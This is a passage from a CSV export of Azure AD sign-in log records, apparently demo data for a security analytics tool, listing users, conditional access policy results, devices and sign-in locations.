MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 03:50,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",52a6664f-09a1-41b6-959f-775dda460200,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,52a6664f-09a1-41b6-959f-775dda460200,SigninLogs,Sucess,36.6404686,-78.26995087
+1853,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,51:01.0,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,498ae609-12b5-4de0-aa19-2803ce3c3ce9,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 03:51,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",8d371308-4e1f-476f-97d6-c0ea759f0400,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,8d371308-4e1f-476f-97d6-c0ea759f0400,SigninLogs,Sucess,36.6404686,-78.26995087
+1854,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,15:13.2,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,2e6fd17c-1227-433e-b3a3-80a74374a7dc,Microsoft.aadiam,Microsoft.aadiam,,Ofer Shezaf,4,IL,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 04:15,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",7177d659-5709-4c9c-976e-940f58f80200,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 35.44601058959961, 'latitude': 33.017520904541016}, 'state': 'Hazafon', 'city': 'Jish'}",none,none,none,none,[],{'errorCode': 0},Ofer Shezaf,9c459db5-0407-43fe-a2ea-126757297beb,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,7177d659-5709-4c9c-976e-940f58f80200,SigninLogs,Sucess,33.0175209,35.44601059
+1855,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,14:26.2,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,2e6fd17c-1227-433e-b3a3-80a74374a7dc,Microsoft.aadiam,Microsoft.aadiam,,Ofer Shezaf,4,IL,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 04:14,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",7177d659-5709-4c9c-976e-940f39f50200,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 35.44601058959961, 'latitude': 33.017520904541016}, 'state': 'Hazafon', 'city': 'Jish'}",none,none,none,none,[],{'errorCode': 0},Ofer Shezaf,9c459db5-0407-43fe-a2ea-126757297beb,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,7177d659-5709-4c9c-976e-940f39f50200,SigninLogs,Sucess,33.0175209,35.44601059
+1856,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,54:00.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,29592158-7166-406a-8157-9b7da4661331,Microsoft.aadiam,Microsoft.aadiam,,Yechiel Levin,4,IL,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 03:54,"{'operatingSystem': 'Windows 10', 'deviceId': '8a35c785-7c5f-463a-ab5e-126c006191f1', 'browser': 'Edge 18.1836', 'displayName': 'YELEVIN-X1', 'trustType': 'Hybrid Azure AD joined', 'isCompliant': True, 'isManaged': True}",534f665b-7e22-44e2-b881-79aeb5cf1b00,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 34.887760162353516, 'latitude': 32.084041595458984}, 'state': 'Hamerkaz', 'city': 'Petah Tikva'}",none,none,none,none,[],{'errorCode': 0},Yechiel Levin,71505601-c694-45ce-8220-4799035a14f5,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,534f665b-7e22-44e2-b881-79aeb5cf1b00,SigninLogs,Sucess,32.0840416,34.88776016
+1857,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,05:43.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,2e6fd17c-1227-433e-b3a3-80a74374a7dc,Microsoft.aadiam,Microsoft.aadiam,,Ofer Shezaf,4,IL,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 04:05,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",8046174b-712f-40d9-9f4e-13cdc1bd0400,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 35.44601058959961, 'latitude': 33.017520904541016}, 'state': 'Hazafon', 'city': 'Jish'}",none,none,none,none,[],{'errorCode': 0},Ofer Shezaf,9c459db5-0407-43fe-a2ea-126757297beb,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,8046174b-712f-40d9-9f4e-13cdc1bd0400,SigninLogs,Sucess,33.0175209,35.44601059
+1858,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,43:43.9,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,cfcf3990-7152-4749-81ff-b96f50d59f00,Microsoft.aadiam,Microsoft.aadiam,,Sentinel Partner Account 6,4,IN,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 04:43,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",4445394f-bc55-4988-8502-680d146c0500,,,"{'countryOrRegion': 'IN', 'geoCoordinates': {'longitude': 72.87770080566406, 'latitude': 19.076000213623047}, 'state': 'Maharashtra', 'city': 'Mumbai'}",none,none,none,none,[],{'errorCode': 0},Sentinel Partner Account 6,dd7e1752-57a8-4e72-8589-6a68e4a1f500,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,4445394f-bc55-4988-8502-680d146c0500,SigninLogs,Sucess,19.07600021,72.87770081
+1859,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,20:55.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,5a1883b3-a76d-4215-8892-7d070d943c43,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 04:20,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",c8ea9bc1-b11e-4423-93a8-17c0a88e0400,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,c8ea9bc1-b11e-4423-93a8-17c0a88e0400,SigninLogs,Sucess,36.6404686,-78.26995087
+1860,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,21:01.2,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,014ca4eb-f1a0-4d93-a565-954684e49a85,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB 